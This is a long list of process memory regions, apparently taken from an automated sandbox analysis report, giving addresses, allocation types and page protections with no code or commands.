|
page read and write
|
||
|
1C22F816000
|
heap
|
page read and write
|
||
|
5B32000
|
trusted library allocation
|
page read and write
|
||
|
398E000
|
heap
|
page read and write
|
||
|
48DF000
|
trusted library allocation
|
page read and write
|
||
|
D5E000
|
heap
|
page read and write
|
||
|
4FAE000
|
stack
|
page read and write
|
||
|
13797300000
|
heap
|
page read and write
|
||
|
7FF886E7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C22DB59000
|
heap
|
page read and write
|
||
|
1C22FA94000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
700000
|
direct allocation
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
2F56000
|
heap
|
page read and write
|
||
|
13797310000
|
heap
|
page read and write
|
||
|
38AF000
|
heap
|
page read and write
|
||
|
2D54000
|
heap
|
page read and write
|
||
|
13798ED5000
|
trusted library allocation
|
page read and write
|
||
|
13799174000
|
trusted library allocation
|
page read and write
|
||
|
1C22F836000
|
heap
|
page read and write
|
||
|
2EC0000
|
trusted library allocation
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
5D6000
|
heap
|
page read and write
|
||
|
828D000
|
trusted library allocation
|
page read and write
|
||
|
6D70000
|
heap
|
page read and write
|
||
|
1379AC01000
|
trusted library allocation
|
page read and write
|
||
|
13796F60000
|
heap
|
page read and write
|
||
|
7FF8870A0000
|
trusted library allocation
|
page read and write
|
||
|
5B2C000
|
trusted library allocation
|
page read and write
|
||
|
22460000
|
direct allocation
|
page read and write
|
||
|
5658000
|
heap
|
page read and write
|
||
|
3104000
|
heap
|
page read and write
|
||
|
1C22F836000
|
heap
|
page read and write
|
||
|
5550000
|
heap
|
page read and write
|
||
|
D77000
|
heap
|
page read and write
|
||
|
2F3C000
|
stack
|
page read and write
|
||
|
3102000
|
heap
|
page read and write
|
||
|
228208E000
|
stack
|
page read and write
|
||
|
8557000
|
heap
|
page read and write
|
||
|
1379709E000
|
heap
|
page read and write
|
||
|
1C22F836000
|
heap
|
page read and write
|
||
|
22B0B000
|
unclassified section
|
page execute and read and write
|
||
|
1C22DBAF000
|
heap
|
page read and write
|
||
|
38A0000
|
heap
|
page read and write
|
||
|
7FF886E80000
|
trusted library allocation
|
page execute and read and write
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
6EC0000
|
direct allocation
|
page read and write
|
||
|
1C22DBBB000
|
heap
|
page read and write
|
||
|
35B0000
|
trusted library allocation
|
page read and write
|
||
|
1C22DB45000
|
heap
|
page read and write
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
5EB000
|
heap
|
page read and write
|
||
|
3A80000
|
remote allocation
|
page execute and read and write
|
||
|
38A1000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
1C22DBBB000
|
heap
|
page read and write
|
||
|
73C8000
|
trusted library allocation
|
page read and write
|
||
|
22816BB000
|
stack
|
page read and write
|
||
|
2280EBF000
|
unkown
|
page read and write
|
||
|
5669000
|
heap
|
page read and write
|
||
|
1C22DB90000
|
heap
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
398A000
|
heap
|
page read and write
|
||
|
38A1000
|
heap
|
page read and write
|
||
|
13799519000
|
trusted library allocation
|
page read and write
|
||
|
7FF887130000
|
trusted library allocation
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
1C22DA9D000
|
heap
|
page read and write
|
||
|
75EF8FE000
|
stack
|
page read and write
|
||
|
1C22DBAF000
|
heap
|
page read and write
|
||
|
D72000
|
heap
|
page read and write
|
||
|
3710000
|
heap
|
page read and write
|
||
|
1C22DB35000
|
heap
|
page read and write
|
||
|
38B0000
|
heap
|
page read and write
|
||
|
D64000
|
heap
|
page read and write
|
||
|
137993F6000
|
trusted library allocation
|
page read and write
|
||
|
7090000
|
heap
|
page read and write
|
||
|
8553000
|
heap
|
page read and write
|
||
|
B5B000
|
stack
|
page read and write
|
||
|
38A1000
|
heap
|
page read and write
|
||
|
1C22DAFF000
|
heap
|
page read and write
|
||
|
567C000
|
heap
|
page read and write
|
||
|
1C22F827000
|
heap
|
page read and write
|
||
|
1C22DB65000
|
heap
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
32CC000
|
heap
|
page read and write
|
||
|
1F3B2E2B000
|
heap
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page read and write
|
||
|
4FC4000
|
trusted library allocation
|
page read and write
|
||
|
1C22DB09000
|
heap
|
page read and write
|
||
|
137B1008000
|
heap
|
page read and write
|
||
|
D84000
|
heap
|
page read and write
|
||
|
2254E000
|
stack
|
page read and write
|
||
|
137A8F9D000
|
trusted library allocation
|
page read and write
|
||
|
30CF000
|
stack
|
page read and write
|
||
|
6CBF000
|
stack
|
page read and write
|
||
|
2E3D000
|
stack
|
page read and write
|
||
|
1C22DBBB000
|
heap
|
page read and write
|
||
|
1C22DB5D000
|
heap
|
page read and write
|
||
|
137B10D4000
|
heap
|
page read and write
|
||
|
3020000
|
heap
|
page read and write
|
||
|
585A000
|
heap
|
page read and write
|
||
|
847B000
|
stack
|
page read and write
|
||
|
D5E000
|
heap
|
page read and write
|
||
|
4E5E000
|
stack
|
page read and write
|
||
|
567E000
|
heap
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
1C22DB6B000
|
heap
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
1C22DB5F000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
1379AA2E000
|
trusted library allocation
|
page read and write
|
||
|
22FA5000
|
heap
|
page read and write
|
||
|
D52000
|
heap
|
page read and write
|
||
|
6F0000
|
direct allocation
|
page read and write
|
||
|
D71000
|
heap
|
page read and write
|
||
|
1379AAC1000
|
trusted library allocation
|
page read and write
|
||
|
D63000
|
heap
|
page read and write
|
||
|
2EC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2EB0000
|
trusted library allocation
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
1C22DB45000
|
heap
|
page read and write
|
||
|
82E0000
|
trusted library allocation
|
page read and write
|
||
|
58E9000
|
trusted library allocation
|
page read and write
|
||
|
6EA0000
|
direct allocation
|
page read and write
|
||
|
22C9D000
|
heap
|
page read and write
|
||
|
328F000
|
stack
|
page read and write
|
||
|
2280FFF000
|
stack
|
page read and write
|
||
|
51A000
|
heap
|
page read and write
|
||
|
1C22DAEB000
|
heap
|
page read and write
|
||
|
1C22F815000
|
heap
|
page read and write
|
||
|
1C22F81D000
|
heap
|
page read and write
|
||
|
7FF887080000
|
trusted library allocation
|
page read and write
|
||
|
D8B000
|
heap
|
page read and write
|
||
|
1C22DB90000
|
heap
|
page read and write
|
||
|
13797150000
|
heap
|
page read and write
|
||
|
7000000
|
direct allocation
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
2277F000
|
stack
|
page read and write
|
||
|
1C22DA98000
|
heap
|
page read and write
|
||
|
1C22DA10000
|
heap
|
page read and write
|
||
|
1C22DB5A000
|
heap
|
page read and write
|
||
|
5661000
|
heap
|
page read and write
|
||
|
3495000
|
heap
|
page read and write
|
||
|
C4F000
|
stack
|
page read and write
|
||
|
680000
|
direct allocation
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
7560000
|
heap
|
page execute and read and write
|
||
|
D6E000
|
heap
|
page read and write
|
||
|
39425FE000
|
stack
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
63CD000
|
remote allocation
|
page execute and read and write
|
||
|
3105000
|
heap
|
page read and write
|
||
|
565F000
|
heap
|
page read and write
|
||
|
22B36000
|
direct allocation
|
page execute and read and write
|
||
|
398B000
|
heap
|
page read and write
|
||
|
38B1000
|
heap
|
page read and write
|
||
|
7FF886DCD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C22DBA7000
|
heap
|
page read and write
|
||
|
8230000
|
trusted library allocation
|
page execute and read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
38D7000
|
heap
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
137994EE000
|
trusted library allocation
|
page read and write
|
||
|
87B0000
|
trusted library allocation
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
1379A562000
|
trusted library allocation
|
page read and write
|
||
|
22C45000
|
heap
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
6FD000
|
stack
|
page read and write
|
||
|
5658000
|
heap
|
page read and write
|
||
|
1C22DA98000
|
heap
|
page read and write
|
||
|
1C22F81C000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
1C22DB5F000
|
heap
|
page read and write
|
||
|
22E9B000
|
heap
|
page read and write
|
||
|
38AB000
|
heap
|
page read and write
|
||
|
327C000
|
stack
|
page read and write
|
||
|
1F3B2DB0000
|
heap
|
page read and write
|
||
|
5850000
|
trusted library allocation
|
page read and write
|
||
|
D7F000
|
heap
|
page read and write
|
||
|
1C22DA9B000
|
heap
|
page read and write
|
||
|
3495000
|
heap
|
page read and write
|
||
|
3495000
|
heap
|
page read and write
|
||
|
D50000
|
heap
|
page read and write
|
||
|
E70000
|
heap
|
page read and write
|
||
|
75F02FF000
|
stack
|
page read and write
|
||
|
32B8000
|
heap
|
page read and write
|
||
|
130000
|
heap
|
page read and write
|
||
|
13797094000
|
heap
|
page read and write
|
||
|
D6A000
|
heap
|
page read and write
|
||
|
13799330000
|
trusted library allocation
|
page read and write
|
||
|
1C22DAFE000
|
heap
|
page read and write
|
||
|
D90000
|
heap
|
page read and write
|
||
|
3495000
|
heap
|
page read and write
|
||
|
7FF887000000
|
trusted library allocation
|
page read and write
|
||
|
565C000
|
heap
|
page read and write
|
||
|
1C22F836000
|
heap
|
page read and write
|
||
|
2CDC000
|
heap
|
page read and write
|
||
|
D6A000
|
heap
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
5661000
|
heap
|
page read and write
|
||
|
13797050000
|
heap
|
page read and write
|
||
|
7FF886F80000
|
trusted library allocation
|
page execute and read and write
|
||
|
137B0FFD000
|
heap
|
page read and write
|
||
|
6E4C000
|
stack
|
page read and write
|
||
|
480E000
|
stack
|
page read and write
|
||
|
22B20000
|
direct allocation
|
page read and write
|
||
|
5669000
|
heap
|
page read and write
|
||
|
22C44000
|
heap
|
page read and write
|
||
|
6E60000
|
direct allocation
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
227FE000
|
stack
|
page read and write
|
||
|
6C7E000
|
stack
|
page read and write
|
||
|
5998000
|
heap
|
page read and write
|
||
|
38A8000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
35B0000
|
heap
|
page read and write
|
||
|
1F3B2DD5000
|
heap
|
page read and write
|
||
|
1C22DBAF000
|
heap
|
page read and write
|
||
|
2EF0000
|
trusted library allocation
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
599D000
|
heap
|
page read and write
|
||
|
220BE000
|
stack
|
page read and write
|
||
|
1379AAB0000
|
trusted library allocation
|
page read and write
|
||
|
1C22DB5A000
|
heap
|
page read and write
|
||
|
75EFDFE000
|
stack
|
page read and write
|
||
|
228220A000
|
stack
|
page read and write
|
||
|
D6D000
|
heap
|
page read and write
|
||
|
6E0D000
|
stack
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
D71000
|
heap
|
page read and write
|
||
|
D88000
|
heap
|
page read and write
|
||
|
13799510000
|
trusted library allocation
|
page read and write
|
||
|
13797290000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C22F836000
|
heap
|
page read and write
|
||
|
1C22F811000
|
heap
|
page read and write
|
||
|
D75000
|
heap
|
page read and write
|
||
|
38AF000
|
heap
|
page read and write
|
||
|
1C22F81C000
|
heap
|
page read and write
|
||
|
1C22F836000
|
heap
|
page read and write
|
||
|
137B1190000
|
heap
|
page read and write
|
||
|
13797146000
|
heap
|
page read and write
|
||
|
770000
|
direct allocation
|
page read and write
|
||
|
22C9E000
|
heap
|
page read and write
|
||
|
D38000
|
heap
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
137A8CC0000
|
trusted library allocation
|
page read and write
|
||
|
228218D000
|
stack
|
page read and write
|
||
|
1C22FA90000
|
heap
|
page read and write
|
||
|
228117E000
|
stack
|
page read and write
|
||
|
359F000
|
stack
|
page read and write
|
||
|
22C8D000
|
heap
|
page read and write
|
||
|
2F1A000
|
heap
|
page read and write
|
||
|
4870000
|
heap
|
page read and write
|
||
|
2EE0000
|
trusted library allocation
|
page read and write
|
||
|
5658000
|
heap
|
page read and write
|
||
|
5651000
|
heap
|
page read and write
|
||
|
D83000
|
heap
|
page read and write
|
||
|
8F60000
|
direct allocation
|
page execute and read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
228FE000
|
stack
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
1C22DB67000
|
heap
|
page read and write
|
||
|
359F000
|
stack
|
page read and write
|
||
|
228107D000
|
stack
|
page read and write
|
||
|
22ABE000
|
stack
|
page read and write
|
||
|
7FF887100000
|
trusted library allocation
|
page read and write
|
||
|
6DC0000
|
heap
|
page read and write
|
||
|
2F56000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page readonly
|
||
|
7FF887020000
|
trusted library allocation
|
page read and write
|
||
|
1C22DB6E000
|
heap
|
page read and write
|
||
|
3980000
|
heap
|
page read and write
|
||
|
6E87000
|
heap
|
page read and write
|
||
|
38B1000
|
heap
|
page read and write
|
||
|
6CFE000
|
stack
|
page read and write
|
||
|
22BC1000
|
heap
|
page read and write
|
||
|
22BC0000
|
heap
|
page read and write
|
||
|
5675000
|
heap
|
page read and write
|
||
|
8541000
|
heap
|
page read and write
|
||
|
233CD000
|
unclassified section
|
page execute and read and write
|
||
|
45CD000
|
remote allocation
|
page execute and read and write
|
||
|
32D000
|
stack
|
page read and write
|
||
|
D40000
|
heap
|
page read and write
|
||
|
226FC000
|
stack
|
page read and write
|
||
|
38BA000
|
heap
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
13798CB1000
|
trusted library allocation
|
page read and write
|
||
|
23446000
|
unclassified section
|
page execute and read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
1C22F836000
|
heap
|
page read and write
|
||
|
38BA000
|
heap
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
1C22DBBB000
|
heap
|
page read and write
|
||
|
D47000
|
heap
|
page read and write
|
||
|
5657000
|
heap
|
page read and write
|
||
|
315E000
|
stack
|
page read and write
|
||
|
567B000
|
heap
|
page read and write
|
||
|
5BD3000
|
heap
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
8512000
|
heap
|
page read and write
|
||
|
5680000
|
heap
|
page read and write
|
||
|
1C22DB45000
|
heap
|
page read and write
|
||
|
1C22F81B000
|
heap
|
page read and write
|
||
|
38BA000
|
heap
|
page read and write
|
||
|
75EE000
|
stack
|
page read and write
|
||
|
567D000
|
heap
|
page read and write
|
||
|
7FF886E76000
|
trusted library allocation
|
page read and write
|
||
|
22E9B000
|
heap
|
page read and write
|
||
|
7FF887110000
|
trusted library allocation
|
page read and write
|
||
|
1C22DB54000
|
heap
|
page read and write
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
33D0000
|
heap
|
page readonly
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
5680000
|
heap
|
page read and write
|
||
|
5656000
|
heap
|
page read and write
|
||
|
5A9B000
|
heap
|
page read and write
|
||
|
5988000
|
heap
|
page read and write
|
||
|
13799F19000
|
trusted library allocation
|
page read and write
|
||
|
D38000
|
heap
|
page read and write
|
||
|
387E000
|
stack
|
page read and write
|
||
|
843C000
|
stack
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
558000
|
heap
|
page read and write
|
||
|
3494000
|
heap
|
page read and write
|
||
|
7FF886FD0000
|
trusted library allocation
|
page read and write
|
||
|
3495000
|
heap
|
page read and write
|
||
|
13799500000
|
trusted library allocation
|
page read and write
|
||
|
2CAB000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
3420000
|
heap
|
page read and write
|
||
|
3044000
|
heap
|
page read and write
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
38B5000
|
heap
|
page read and write
|
||
|
2E90000
|
trusted library section
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
56B6000
|
heap
|
page read and write
|
||
|
1C22DB90000
|
heap
|
page read and write
|
||
|
2265F000
|
stack
|
page read and write
|
||
|
56D000
|
heap
|
page read and write
|
||
|
1C22DB54000
|
heap
|
page read and write
|
||
|
38A9000
|
heap
|
page read and write
|
||
|
D20000
|
heap
|
page read and write
|
||
|
B9D000
|
stack
|
page read and write
|
||
|
5658000
|
heap
|
page read and write
|
||
|
1C22DA99000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
D84000
|
heap
|
page read and write
|
||
|
28D8000
|
stack
|
page read and write
|
||
|
7FF887030000
|
trusted library allocation
|
page read and write
|
||
|
3030000
|
heap
|
page readonly
|
||
|
1C22DB45000
|
heap
|
page read and write
|
||
|
1C22DB93000
|
heap
|
page read and write
|
||
|
2EBA000
|
stack
|
page read and write
|
||
|
1C22D910000
|
heap
|
page read and write
|
||
|
38A1000
|
heap
|
page read and write
|
||
|
1C22DBAF000
|
heap
|
page read and write
|
||
|
5658000
|
heap
|
page read and write
|
||
|
FE000
|
stack
|
page read and write
|
||
|
D6C000
|
heap
|
page read and write
|
||
|
137B133C000
|
heap
|
page read and write
|
||
|
512F000
|
stack
|
page read and write
|
||
|
1C22F81E000
|
heap
|
page read and write
|
||
|
1C22DB74000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
137B1160000
|
heap
|
page execute and read and write
|
||
|
4778000
|
trusted library allocation
|
page read and write
|
||
|
58A9000
|
trusted library allocation
|
page read and write
|
||
|
38B1000
|
heap
|
page read and write
|
||
|
225E0000
|
remote allocation
|
page read and write
|
||
|
1C22DB93000
|
heap
|
page read and write
|
||
|
5659000
|
heap
|
page read and write
|
||
|
2C7E000
|
stack
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
7FF8870E0000
|
trusted library allocation
|
page read and write
|
||
|
87E0000
|
trusted library allocation
|
page read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
1C22DAFC000
|
heap
|
page read and write
|
||
|
49D5000
|
trusted library allocation
|
page read and write
|
||
|
2D05000
|
heap
|
page read and write
|
||
|
7FF886DC4000
|
trusted library allocation
|
page read and write
|
||
|
2ECD000
|
trusted library allocation
|
page execute and read and write
|
||
|
8584000
|
heap
|
page read and write
|
||
|
6E50000
|
direct allocation
|
page read and write
|
||
|
4830000
|
trusted library allocation
|
page read and write
|
||
|
38AD000
|
heap
|
page read and write
|
||
|
D88000
|
heap
|
page read and write
|
||
|
13797220000
|
trusted library allocation
|
page read and write
|
||
|
22BBC000
|
stack
|
page read and write
|
||
|
7FF886F7A000
|
trusted library allocation
|
page read and write
|
||
|
1C22F4C0000
|
heap
|
page read and write
|
||
|
5651000
|
heap
|
page read and write
|
||
|
1C22F813000
|
heap
|
page read and write
|
||
|
38B8000
|
heap
|
page read and write
|
||
|
CFE000
|
stack
|
page read and write
|
||
|
73E0000
|
heap
|
page read and write
|
||
|
5881000
|
trusted library allocation
|
page read and write
|
||
|
2D13000
|
heap
|
page read and write
|
||
|
32DF000
|
unkown
|
page read and write
|
||
|
228210E000
|
stack
|
page read and write
|
||
|
1C22DB5A000
|
heap
|
page read and write
|
||
|
22C39000
|
heap
|
page read and write
|
||
|
D75000
|
heap
|
page read and write
|
||
|
75EFBFF000
|
stack
|
page read and write
|
||
|
1C22DB35000
|
heap
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
137B1048000
|
heap
|
page read and write
|
||
|
82C0000
|
trusted library allocation
|
page read and write
|
||
|
75EFFFE000
|
stack
|
page read and write
|
||
|
22CD1000
|
heap
|
page read and write
|
There are 1106 hidden memdumps, click here to show them.